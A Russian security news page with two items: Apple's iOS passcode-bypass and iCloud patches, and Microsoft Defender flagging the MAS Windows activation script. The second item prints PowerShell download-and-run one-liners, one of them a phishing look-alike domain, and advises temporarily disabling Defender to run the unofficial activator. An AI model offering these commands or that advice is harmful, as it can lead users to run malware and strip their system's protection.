Apple пропатчила две уязвимости обхода пароля в iOS

Apple пропатчила две уязвимости обхода пароля в iOS

Apple пропатчила две уязвимости обхода пароля в iOS

Apple выпустила наборы патчей для iOS 12 и iCloud, которые устраняют множество проблем безопасности. В iOS устранены две уязвимости обхода пароля, а в iCloud исправлены в числе прочих критические бреши в безопасности.

Также в этом наборе обновлений корпорация разобралась с досадными недостатками iPhone XS. Напомним, что пользователи новой линейки смартфонов жаловались на проблемы с зарядкой устройств, а также на баги с сетью Wi-Fi.

С выпуском версии iOS 12.0.1 исправлены две значимые бреши, одна из которых находилась в QuickLook, а другая в VoiceOver. Эти уязвимости позволяли обойти защиту паролем и получить доступ к контактам, фотографиям, электронным письмам и телефонным номерам.

Обе проблемы были обнаружены экспертом Жозе Родригесом, который разместил на YouTube ролики, доказывающие наличие бреши.

Уязвимостям присвоили идентификаторы CVE-2018-4380 и CVE-2018-4379.

С релизом Windows-версии iCloud 7.7.12 Apple пропатчила 19 уязвимостей. 13 из них критические, так как позволяют удаленно выполнить код. Идентификаторы следующие: CVE-2018-4191, CVE-2018-4311, CVE-2018-4316, CVE-2018-4299, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4319, CVE-2018-4309, CVE-2018-4197, CVE-2018-4306, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4317, CVE-2018-4318, CVE-2018-4345 и CVE-2018-4361.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru